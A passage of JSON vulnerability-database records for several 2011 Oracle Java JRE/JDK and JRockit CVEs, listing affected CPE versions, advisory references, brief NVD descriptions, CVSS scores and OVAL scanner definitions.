"cpe:/a:sun:jdk:1.6.0:update2", "cpe:/a:sun:jre:1.5.0:update18", "cpe:/a:sun:jre:1.6.0:update_3", "cpe:/a:sun:jre:1.6.0:update_1", "cpe:/a:sun:jre:1.5.0:update19", "cpe:/a:sun:jre:1.5.0:update27", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:jdk:1.6.0:update_15", "cpe:/a:sun:jdk:1.5.0:update25", "cpe:/a:sun:jdk:1.4.2_7", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jdk:1.6.0:update_20", "cpe:/a:sun:jdk:1.5.0:update24", "cpe:/a:sun:jdk:1.4.2_29", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jdk:1.6.0:update_5", "cpe:/a:sun:jre:1.5.0:update14", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.6.0:update_24", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:jre:1.6.0:update_4", "cpe:/a:sun:jdk:1.4.2_11", "cpe:/a:sun:jre:1.6.0:update_11", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jdk:1.4.2_28", "cpe:/a:sun:jre:1.5.0:update29", "cpe:/a:sun:jdk:1.5.0:update23", "cpe:/a:sun:jre:1.5.0:update6", "cpe:/a:sun:jre:1.6.0:update_10", "cpe:/a:sun:jdk:1.6.0:update_16", "cpe:/a:sun:jdk:1.6.0:update_18", "cpe:/a:sun:jdk:1.4.2_31", "cpe:/a:sun:jre:1.5.0:update4", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jdk:1.6.0:update_4", "cpe:/a:sun:jre:1.6.0:update_23", "cpe:/a:sun:jdk:1.6.0:update_11", "cpe:/a:sun:jre:1.5.0:update17", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:jre:1.5.0:update8", "cpe:/a:sun:jdk:1.4.2_20", "cpe:/a:sun:jdk:1.4.2_27", "cpe:/a:sun:jdk:1.5.0:update11", "cpe:/a:sun:jdk:1.4.2_6", "cpe:/a:sun:jdk:1.5.0:update6", "cpe:/a:sun:jdk:1.6.0:update_21", "cpe:/a:sun:jdk:1.4.2_15", "cpe:/a:sun:jre:1.4.2_25", "cpe:/a:sun:jdk:1.5.0:update13", "cpe:/a:sun:jdk:1.6.0:update_24", "cpe:/a:sun:jdk:1.6.0:update_26", "cpe:/a:sun:jdk:1.4.2_4", "cpe:/a:sun:jdk:1.5.0:update17", "cpe:/a:sun:jdk:1.4.2_32", "cpe:/a:sun:jdk:1.5.0:update10", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:jdk:1.4.2_33", "cpe:/a:sun:jdk:1.4.2_16", "cpe:/a:sun:jre:1.4.2_29", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:jdk:1.7.0", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:jdk:1.6.0:update_13", "cpe:/a:sun:jre:1.5.0:update1", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jdk:1.4.2_3", "cpe:/a:sun:jdk:1.5.0:update21", "cpe:/a:sun:jdk:1.5.0:update11_b03", "cpe:/a:sun:jdk:1.6.0:update_23", "cpe:/a:sun:jre:1.4.2_26", "cpe:/a:sun:jre:1.4.2_27", "cpe:/a:sun:jdk:1.6.0:update1", "cpe:/a:sun:jdk:1.6.0:update_25", "cpe:/a:sun:jdk:1.6.0:update_6", "cpe:/a:sun:jre:1.6.0:update_5", "cpe:/a:sun:jdk:1.4.2_24", "cpe:/a:sun:jdk:1.5.0:update4", "cpe:/a:sun:jre:1.5.0:update15", "cpe:/a:sun:jdk:1.5.0:update1", "cpe:/a:sun:jdk:1.5.0:update20", "cpe:/a:sun:jre:1.5.0:update24", "cpe:/a:sun:jre:1.6.0:update_19", "cpe:/a:sun:jdk:1.4.2", "cpe:/a:sun:jre:1.5.0:update7", "cpe:/a:sun:jdk:1.4.2_21", "cpe:/a:sun:jdk:1.6.0:update_10", "cpe:/a:sun:jre:1.5.0:update10", "cpe:/a:sun:jre:1.4.2_30", "cpe:/a:sun:jdk:1.6.0:update_12", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.6.0:update_16", "cpe:/a:sun:jre:1.4.2_28", "cpe:/a:sun:jdk:1.5.0:update2", "cpe:/a:sun:jdk:1.4.2_30", "cpe:/a:sun:jdk:1.4.2_18", "cpe:/a:sun:jre:1.5.0:update2", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:jdk:1.5.0:update7", "cpe:/a:sun:jre:1.5.0:update12", "cpe:/a:sun:jdk:1.5.0:update22", "cpe:/a:sun:jdk:1.5.0:update14", "cpe:/a:sun:jdk:1.4.2_5", "cpe:/a:sun:jre:1.5.0:update23", "cpe:/a:sun:jdk:1.4.2_8", "cpe:/a:sun:jre:1.5.0:update9", "cpe:/a:sun:jre:1.6.0:update_18", "cpe:/a:sun:jre:1.6.0:update_14", "cpe:/a:sun:jdk:1.5.0:update15", "cpe:/a:sun:jre:1.4.2", "cpe:/a:sun:jre:1.5.0:update31", "cpe:/a:sun:jre:1.6.0:update_12", "cpe:/a:sun:jre:1.5.0:update22", "cpe:/a:sun:jdk:1.4.2_17", "cpe:/a:sun:jre:1.6.0:update_6", "cpe:/a:sun:jdk:1.4.2_1", "cpe:/a:sun:jdk:1.4.2_25", "cpe:/a:sun:jdk:1.4.2_10", "cpe:/a:sun:jre:1.4.2_32", "cpe:/a:sun:jdk:1.5.0:update31", "cpe:/a:sun:jdk:1.5.0:update5", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:jdk:1.4.2_13", "cpe:/a:sun:jdk:1.5.0:update29", "cpe:/a:sun:jre:1.6.0:update_21", "cpe:/a:sun:jdk:1.4.2_19", "cpe:/a:sun:jre:1.5.0:update25", "cpe:/a:sun:jdk:1.5.0:update28", "cpe:/a:sun:jdk:1.4.2_22", "cpe:/a:sun:jdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_23", "cpe:/a:sun:jdk:1.6.0:update_3", "cpe:/a:sun:jre:1.5.0:update21", "cpe:/a:sun:jre:1.4.2_33", "cpe:/a:sun:jdk:1.5.0:update7_b03", "cpe:/a:sun:jre:1.5.0:update5", "cpe:/a:sun:jre:1.6.0:update_15", "cpe:/a:sun:jre:1.5.0:update11", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:jre:1.7.0", "cpe:/a:sun:jre:1.4.2_24", "cpe:/a:sun:jdk:1.5.0:update18", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:1.4.2_2", "cpe:/a:sun:jdk:1.6.0:update_14", "cpe:/a:sun:jre:1.5.0:update20", "cpe:/a:sun:jdk:1.6.0:update_27", "cpe:/a:sun:jdk:1.5.0:update19", "cpe:/a:sun:jre:1.6.0:update_26", "cpe:/a:sun:jdk:1.6.0:update_7"], "id": "CVE-2011-3548", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3548", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T12:20:51", "references": ["http://www.securityfocus.com/bid/50215", "http://www.redhat.com/support/errata/RHSA-2011-1384.html", "http://marc.info/?l=bugtraq&m=133365109612558&w=2", "http://www.ibm.com/developerworks/java/jdk/alerts/", "http://rhn.redhat.com/errata/RHSA-2013-1455.html", "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", "http://secunia.com/advisories/48308", "http://marc.info/?l=bugtraq&m=134254957702612&w=2", "http://www.ubuntu.com/usn/USN-1263-1", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70850", "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", "http://www.securitytracker.com/id?1026215", "http://marc.info/?l=bugtraq&m=134254866602253&w=2", "http://marc.info/?l=bugtraq&m=132750579901589&w=2", "http://security.gentoo.org/glsa/glsa-201406-32.xml"], "description": "Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE, 7, 6 Update 27 and earlier, and 5.0 Update 31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deserialization.", "edition": 6, "reporter": "NVD", "published": "2011-10-19T17:55:01", "title": "CVE-2011-3521", "type": "cve", "enchantments": {"score": {"modified": "2018-01-06T12:20:51", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:13662", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13662"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-3521"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:13662", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:13662"}], "modified": "2018-01-05T21:29:19", "cpe": ["cpe:/a:sun:jdk:1.5.0:update9", "cpe:/a:sun:jre:1.6.0:update_20", "cpe:/a:sun:jdk:1.5.0:update12", "cpe:/a:sun:jdk:1.5.0:update26", "cpe:/a:sun:jdk:1.6.0:update_17", "cpe:/a:sun:jre:1.6.0:update_25", "cpe:/a:sun:jre:1.6.0:update_22", "cpe:/a:sun:jdk:1.5.0:update3", "cpe:/a:sun:jre:1.6.0:update_2", "cpe:/a:sun:jre:1.6.0:update_7", "cpe:/a:sun:jdk:1.5.0:update27", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.6.0:update_27", "cpe:/a:sun:jdk:1.5.0:update8", "cpe:/a:sun:jre:1.6.0:update_17", "cpe:/a:sun:jre:1.5.0:update3", "cpe:/a:sun:jdk:1.5.0:update16", "cpe:/a:sun:jre:1.5.0:update13", "cpe:/a:sun:jre:1.5.0:update16", "cpe:/a:sun:jre:1.5.0:update26", "cpe:/a:sun:jdk:1.6.0:update_22", "cpe:/a:sun:jdk:1.6.0:update_19", "cpe:/a:sun:jre:1.6.0:update_13", "cpe:/a:sun:jdk:1.6.0:update2", "cpe:/a:sun:jre:1.5.0:update18", "cpe:/a:sun:jre:1.6.0:update_3", "cpe:/a:sun:jre:1.6.0:update_1", "cpe:/a:sun:jre:1.5.0:update19", "cpe:/a:sun:jre:1.5.0:update27", "cpe:/a:sun:jdk:1.6.0:update_15", "cpe:/a:sun:jdk:1.5.0:update25", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jdk:1.6.0:update_20", "cpe:/a:sun:jdk:1.5.0:update24", "cpe:/a:sun:jdk:1.6.0:update_5", "cpe:/a:sun:jre:1.5.0:update14", "cpe:/a:sun:jre:1.6.0:update_24", "cpe:/a:sun:jre:1.6.0:update_4", "cpe:/a:sun:jre:1.6.0:update_11", "cpe:/a:sun:jre:1.5.0:update29", "cpe:/a:sun:jdk:1.5.0:update23", "cpe:/a:sun:jre:1.5.0:update6", "cpe:/a:sun:jre:1.6.0:update_10", "cpe:/a:sun:jdk:1.6.0:update_16", "cpe:/a:sun:jdk:1.6.0:update_18", "cpe:/a:sun:jre:1.5.0:update4", "cpe:/a:sun:jdk:1.6.0:update_4", "cpe:/a:sun:jre:1.6.0:update_23", "cpe:/a:sun:jdk:1.6.0:update_11", "cpe:/a:sun:jre:1.5.0:update17", "cpe:/a:sun:jre:1.5.0:update8", "cpe:/a:sun:jdk:1.5.0:update11", "cpe:/a:sun:jdk:1.5.0:update6", "cpe:/a:sun:jdk:1.6.0:update_21", "cpe:/a:sun:jdk:1.5.0:update13", "cpe:/a:sun:jdk:1.6.0:update_24", "cpe:/a:sun:jdk:1.6.0:update_26", "cpe:/a:sun:jdk:1.5.0:update17", "cpe:/a:sun:jdk:1.5.0:update10", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:jdk:1.7.0", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:jdk:1.6.0:update_13", "cpe:/a:sun:jre:1.5.0:update1", "cpe:/a:sun:jdk:1.5.0:update21", "cpe:/a:sun:jdk:1.5.0:update11_b03", "cpe:/a:sun:jdk:1.6.0:update_23", "cpe:/a:sun:jdk:1.6.0:update1", "cpe:/a:sun:jdk:1.6.0:update_25", "cpe:/a:sun:jdk:1.6.0:update_6", "cpe:/a:sun:jre:1.6.0:update_5", "cpe:/a:sun:jdk:1.5.0:update4", "cpe:/a:sun:jre:1.5.0:update15", "cpe:/a:sun:jdk:1.5.0:update1", "cpe:/a:sun:jdk:1.5.0:update20", "cpe:/a:sun:jre:1.5.0:update24", "cpe:/a:sun:jre:1.6.0:update_19", "cpe:/a:sun:jre:1.5.0:update7", "cpe:/a:sun:jdk:1.6.0:update_10", "cpe:/a:sun:jre:1.5.0:update10", "cpe:/a:sun:jdk:1.6.0:update_12", "cpe:/a:sun:jre:1.6.0:update_16", "cpe:/a:sun:jdk:1.5.0:update2", "cpe:/a:sun:jre:1.5.0:update2", "cpe:/a:sun:jdk:1.5.0:update7", "cpe:/a:sun:jre:1.5.0:update12", "cpe:/a:sun:jdk:1.5.0:update22", "cpe:/a:sun:jdk:1.5.0:update14", "cpe:/a:sun:jre:1.5.0:update23", "cpe:/a:sun:jre:1.5.0:update9", "cpe:/a:sun:jre:1.6.0:update_18", "cpe:/a:sun:jre:1.6.0:update_14", "cpe:/a:sun:jdk:1.5.0:update15", "cpe:/a:sun:jre:1.5.0:update31", "cpe:/a:sun:jre:1.6.0:update_12", "cpe:/a:sun:jre:1.5.0:update22", "cpe:/a:sun:jre:1.6.0:update_6", "cpe:/a:sun:jdk:1.5.0:update31", "cpe:/a:sun:jdk:1.5.0:update5", "cpe:/a:sun:jdk:1.5.0:update29", "cpe:/a:sun:jre:1.6.0:update_21", "cpe:/a:sun:jre:1.5.0:update25", "cpe:/a:sun:jdk:1.5.0:update28", "cpe:/a:sun:jdk:1.6.0:update_3", "cpe:/a:sun:jre:1.5.0:update21", "cpe:/a:sun:jdk:1.5.0:update7_b03", "cpe:/a:sun:jre:1.5.0:update5", "cpe:/a:sun:jre:1.6.0:update_15", "cpe:/a:sun:jre:1.5.0:update11", "cpe:/a:sun:jre:1.7.0", "cpe:/a:sun:jdk:1.5.0:update18", "cpe:/a:sun:jdk:1.6.0:update_14", "cpe:/a:sun:jre:1.5.0:update20", "cpe:/a:sun:jdk:1.6.0:update_27", "cpe:/a:sun:jdk:1.5.0:update19", "cpe:/a:sun:jre:1.6.0:update_26", "cpe:/a:sun:jdk:1.6.0:update_7"], "id": "CVE-2011-3521", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3521", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-06T12:20:51", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/70836", "http://www.redhat.com/support/errata/RHSA-2011-1384.html", "http://marc.info/?l=bugtraq&m=133365109612558&w=2", "http://www.redhat.com/support/errata/RHSA-2012-0006.html", "http://www.ibm.com/developerworks/java/jdk/alerts/", "http://rhn.redhat.com/errata/RHSA-2013-1455.html", "http://rhn.redhat.com/errata/RHSA-2012-0508.html", "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", "http://secunia.com/advisories/48308", "http://marc.info/?l=bugtraq&m=134254957702612&w=2", "http://marc.info/?l=bugtraq&m=133728004526190&w=2", "http://www.ubuntu.com/usn/USN-1263-1", "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", "http://www.securitytracker.com/id?1026215", "http://www.securityfocus.com/bid/50234", "http://marc.info/?l=bugtraq&m=134254866602253&w=2", "http://marc.info/?l=bugtraq&m=132750579901589&w=2", "http://security.gentoo.org/glsa/glsa-201406-32.xml"], "description": "Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, 1.4.2_33 and earlier, and JRockit R28.1.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability, related to RMI, a different vulnerability than CVE-2011-3556.", "edition": 7, "reporter": "NVD", "published": "2011-10-19T17:55:01", "title": "CVE-2011-3557", "type": "cve", "enchantments": {"score": {"modified": "2018-01-06T12:20:51", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:14373", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14373"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-3557"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:14373", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:14373"}], "modified": "2018-01-05T21:29:20", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jdk:1.5.0:update9", "cpe:/a:sun:jre:1.6.0:update_20", "cpe:/a:sun:jre:1.4.2_21", "cpe:/a:sun:jdk:1.4.2_9", "cpe:/a:sun:jdk:1.5.0:update12", "cpe:/a:sun:jre:1.4.2_31", "cpe:/a:sun:jdk:1.5.0:update26", "cpe:/a:sun:jdk:1.6.0:update_17", "cpe:/a:sun:jre:1.6.0:update_25", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.6.0:update_22", "cpe:/a:sun:jdk:1.5.0:update3", "cpe:/a:sun:jdk:1.4.2_23", "cpe:/a:sun:jre:1.6.0:update_2", "cpe:/a:sun:jre:1.6.0:update_7", "cpe:/a:sun:jdk:1.5.0:update27", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jdk:1.4.2_14", "cpe:/a:sun:jre:1.6.0:update_27", "cpe:/a:sun:jdk:1.5.0:update8", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.6.0:update_17", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:jre:1.5.0:update3", "cpe:/a:sun:jre:1.4.2_19", "cpe:/a:oracle:jrockit:r28.0.0", "cpe:/a:sun:jdk:1.5.0:update16", "cpe:/a:sun:jre:1.5.0:update13", "cpe:/a:sun:jdk:1.4.2_26", "cpe:/a:sun:jre:1.5.0:update16", "cpe:/a:sun:jre:1.5.0:update26", "cpe:/a:sun:jdk:1.6.0:update_22", "cpe:/a:sun:jdk:1.6.0:update_19", "cpe:/a:sun:jre:1.6.0:update_13", "cpe:/a:sun:jdk:1.6.0:update2", "cpe:/a:sun:jre:1.5.0:update18", "cpe:/a:sun:jre:1.6.0:update_3", "cpe:/a:sun:jre:1.6.0:update_1", "cpe:/a:sun:jre:1.5.0:update19", "cpe:/a:sun:jre:1.5.0:update27", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:jdk:1.6.0:update_15", "cpe:/a:sun:jdk:1.5.0:update25", "cpe:/a:sun:jdk:1.4.2_7", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jdk:1.6.0:update_20", "cpe:/a:sun:jdk:1.5.0:update24", "cpe:/a:sun:jdk:1.4.2_29", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jdk:1.6.0:update_5", "cpe:/a:sun:jre:1.5.0:update14", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.6.0:update_24", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:jre:1.6.0:update_4", "cpe:/a:sun:jdk:1.4.2_11", "cpe:/a:sun:jre:1.6.0:update_11", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jdk:1.4.2_28", "cpe:/a:sun:jre:1.5.0:update29", "cpe:/a:sun:jdk:1.5.0:update23", "cpe:/a:oracle:jrockit:r28.1.0", "cpe:/a:sun:jre:1.5.0:update6", "cpe:/a:sun:jre:1.6.0:update_10", "cpe:/a:sun:jdk:1.6.0:update_16", "cpe:/a:sun:jdk:1.6.0:update_18", "cpe:/a:sun:jdk:1.4.2_31", "cpe:/a:sun:jre:1.5.0:update4", "cpe:/a:oracle:jrockit:r28.1.1", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jdk:1.6.0:update_4", "cpe:/a:sun:jre:1.6.0:update_23", "cpe:/a:sun:jdk:1.6.0:update_11", "cpe:/a:sun:jre:1.5.0:update17", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:jre:1.5.0:update8", "cpe:/a:sun:jdk:1.4.2_20", "cpe:/a:sun:jdk:1.4.2_27", "cpe:/a:sun:jdk:1.5.0:update11", "cpe:/a:sun:jdk:1.4.2_6", "cpe:/a:sun:jdk:1.5.0:update6", "cpe:/a:sun:jdk:1.6.0:update_21", "cpe:/a:sun:jdk:1.4.2_15", "cpe:/a:sun:jre:1.4.2_25", "cpe:/a:sun:jdk:1.5.0:update13", "cpe:/a:oracle:jrockit:r28.1.4", "cpe:/a:sun:jdk:1.6.0:update_24", "cpe:/a:sun:jdk:1.6.0:update_26", "cpe:/a:sun:jdk:1.4.2_4", "cpe:/a:sun:jdk:1.5.0:update17", "cpe:/a:sun:jdk:1.4.2_32", "cpe:/a:sun:jdk:1.5.0:update10", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:jdk:1.4.2_33", "cpe:/a:sun:jdk:1.4.2_16", "cpe:/a:sun:jre:1.4.2_29", "cpe:/a:sun:jdk:1.5.0", "cpe:/a:sun:jdk:1.7.0", "cpe:/a:sun:jre:1.5.0", "cpe:/a:sun:jdk:1.6.0:update_13", "cpe:/a:sun:jre:1.5.0:update1", "cpe:/a:sun:jre:1.4.2_20", "cpe:/a:sun:jdk:1.4.2_3", "cpe:/a:sun:jdk:1.5.0:update21", "cpe:/a:sun:jdk:1.5.0:update11_b03", "cpe:/a:sun:jdk:1.6.0:update_23", "cpe:/a:sun:jre:1.4.2_26", "cpe:/a:sun:jre:1.4.2_27", "cpe:/a:sun:jdk:1.6.0:update1", "cpe:/a:oracle:jrockit:r28.0.2", "cpe:/a:sun:jdk:1.6.0:update_25", "cpe:/a:sun:jdk:1.6.0:update_6", "cpe:/a:sun:jre:1.6.0:update_5", "cpe:/a:sun:jdk:1.4.2_24", "cpe:/a:sun:jdk:1.5.0:update4", "cpe:/a:sun:jre:1.5.0:update15", "cpe:/a:sun:jdk:1.5.0:update1", "cpe:/a:sun:jdk:1.5.0:update20", "cpe:/a:sun:jre:1.5.0:update24", "cpe:/a:sun:jre:1.6.0:update_19", "cpe:/a:sun:jdk:1.4.2", "cpe:/a:sun:jre:1.5.0:update7", "cpe:/a:sun:jdk:1.4.2_21", "cpe:/a:sun:jdk:1.6.0:update_10", "cpe:/a:sun:jre:1.5.0:update10", "cpe:/a:sun:jre:1.4.2_30", "cpe:/a:sun:jdk:1.6.0:update_12", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:1.6.0:update_16", "cpe:/a:sun:jre:1.4.2_28", "cpe:/a:sun:jdk:1.5.0:update2", "cpe:/a:sun:jdk:1.4.2_30", "cpe:/a:sun:jdk:1.4.2_18", "cpe:/a:sun:jre:1.5.0:update2", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:jdk:1.5.0:update7", "cpe:/a:sun:jre:1.5.0:update12", "cpe:/a:sun:jdk:1.5.0:update22", "cpe:/a:sun:jdk:1.5.0:update14", "cpe:/a:sun:jdk:1.4.2_5", "cpe:/a:sun:jre:1.5.0:update23", "cpe:/a:sun:jdk:1.4.2_8", "cpe:/a:sun:jre:1.5.0:update9", "cpe:/a:sun:jre:1.6.0:update_18", "cpe:/a:sun:jre:1.6.0:update_14", "cpe:/a:sun:jdk:1.5.0:update15", "cpe:/a:sun:jre:1.4.2", "cpe:/a:sun:jre:1.5.0:update31", "cpe:/a:sun:jre:1.6.0:update_12", "cpe:/a:sun:jre:1.5.0:update22", "cpe:/a:sun:jdk:1.4.2_17", "cpe:/a:sun:jre:1.6.0:update_6", "cpe:/a:sun:jdk:1.4.2_1", "cpe:/a:oracle:jrockit:r28.1.3", "cpe:/a:sun:jdk:1.4.2_25", "cpe:/a:sun:jdk:1.4.2_10", "cpe:/a:sun:jre:1.4.2_32", "cpe:/a:sun:jdk:1.5.0:update31", "cpe:/a:sun:jdk:1.5.0:update5", "cpe:/a:sun:jre:1.4.2_22", "cpe:/a:sun:jdk:1.4.2_13", "cpe:/a:sun:jdk:1.5.0:update29", "cpe:/a:sun:jre:1.6.0:update_21", "cpe:/a:sun:jdk:1.4.2_19", "cpe:/a:sun:jre:1.5.0:update25", "cpe:/a:sun:jdk:1.5.0:update28", "cpe:/a:sun:jdk:1.4.2_22", "cpe:/a:sun:jdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_23", "cpe:/a:sun:jdk:1.6.0:update_3", "cpe:/a:sun:jre:1.5.0:update21", "cpe:/a:sun:jre:1.4.2_33", "cpe:/a:sun:jdk:1.5.0:update7_b03", "cpe:/a:sun:jre:1.5.0:update5", "cpe:/a:sun:jre:1.6.0:update_15", "cpe:/a:sun:jre:1.5.0:update11", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:oracle:jrockit:r28.0.1", "cpe:/a:sun:jre:1.7.0", "cpe:/a:sun:jre:1.4.2_24", "cpe:/a:sun:jdk:1.5.0:update18", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:1.4.2_2", "cpe:/a:sun:jdk:1.6.0:update_14", "cpe:/a:sun:jre:1.5.0:update20", "cpe:/a:sun:jdk:1.6.0:update_27", "cpe:/a:sun:jdk:1.5.0:update19", "cpe:/a:sun:jre:1.6.0:update_26", "cpe:/a:sun:jdk:1.6.0:update_7"], "id": "CVE-2011-3557", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3557", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-06T12:20:51", "references": ["http://www.redhat.com/support/errata/RHSA-2011-1384.html", "http://www.ibm.com/developerworks/java/jdk/alerts/", "http://rhn.redhat.com/errata/RHSA-2013-1455.html", "https://exchange.xforce.ibmcloud.com/vulnerabilities/70840", "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", "http://secunia.com/advisories/48308", "http://marc.info/?l=bugtraq&m=134254957702612&w=2", "http://www.ubuntu.com/usn/USN-1263-1", "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", "http://www.securitytracker.com/id?1026215", "http://marc.info/?l=bugtraq&m=134254866602253&w=2", "http://marc.info/?l=bugtraq&m=132750579901589&w=2", "http://security.gentoo.org/glsa/glsa-201406-32.xml", "http://www.securityfocus.com/bid/50246"], "description": "Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, and JRockit R28.1.4 and earlier allows remote authenticated users to affect confidentiality, related to JAXWS.", "edition": 5, "reporter": "NVD", "published": "2011-10-19T17:55:01", "title": "CVE-2011-3553", "type": "cve", "enchantments": {"score": {"modified": "2018-01-06T12:20:51", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:14311", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14311"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2011-3553"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:14311", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:14311"}], "modified": "2018-01-05T21:29:20", "cpe": ["cpe:/a:sun:jre:1.6.0:update_20", "cpe:/a:sun:jdk:1.6.0:update_17", "cpe:/a:sun:jre:1.6.0:update_25", "cpe:/a:sun:jre:1.6.0:update_22", "cpe:/a:sun:jre:1.6.0:update_2", "cpe:/a:sun:jre:1.6.0:update_7", "cpe:/a:sun:jdk:1.6.0", "cpe:/a:sun:jre:1.6.0:update_27", "cpe:/a:sun:jre:1.6.0:update_17", "cpe:/a:oracle:jrockit:r28.0.0", "cpe:/a:sun:jdk:1.6.0:update_22", "cpe:/a:sun:jdk:1.6.0:update_19", "cpe:/a:sun:jre:1.6.0:update_13", "cpe:/a:sun:jdk:1.6.0:update2", "cpe:/a:sun:jre:1.6.0:update_3", "cpe:/a:sun:jre:1.6.0:update_1", "cpe:/a:sun:jdk:1.6.0:update_15", "cpe:/a:sun:jre:1.6.0", "cpe:/a:sun:jdk:1.6.0:update_20", "cpe:/a:sun:jdk:1.6.0:update_5", "cpe:/a:sun:jre:1.6.0:update_24", "cpe:/a:sun:jre:1.6.0:update_4", "cpe:/a:sun:jre:1.6.0:update_11", "cpe:/a:oracle:jrockit:r28.1.0", "cpe:/a:sun:jre:1.6.0:update_10", "cpe:/a:sun:jdk:1.6.0:update_16", "cpe:/a:sun:jdk:1.6.0:update_18", "cpe:/a:oracle:jrockit:r28.1.1", "cpe:/a:sun:jdk:1.6.0:update_4", "cpe:/a:sun:jre:1.6.0:update_23", "cpe:/a:sun:jdk:1.6.0:update_11", "cpe:/a:sun:jdk:1.6.0:update_21", "cpe:/a:oracle:jrockit:r28.1.4", "cpe:/a:sun:jdk:1.6.0:update_24", "cpe:/a:sun:jdk:1.6.0:update_26", "cpe:/a:sun:jdk:1.7.0", 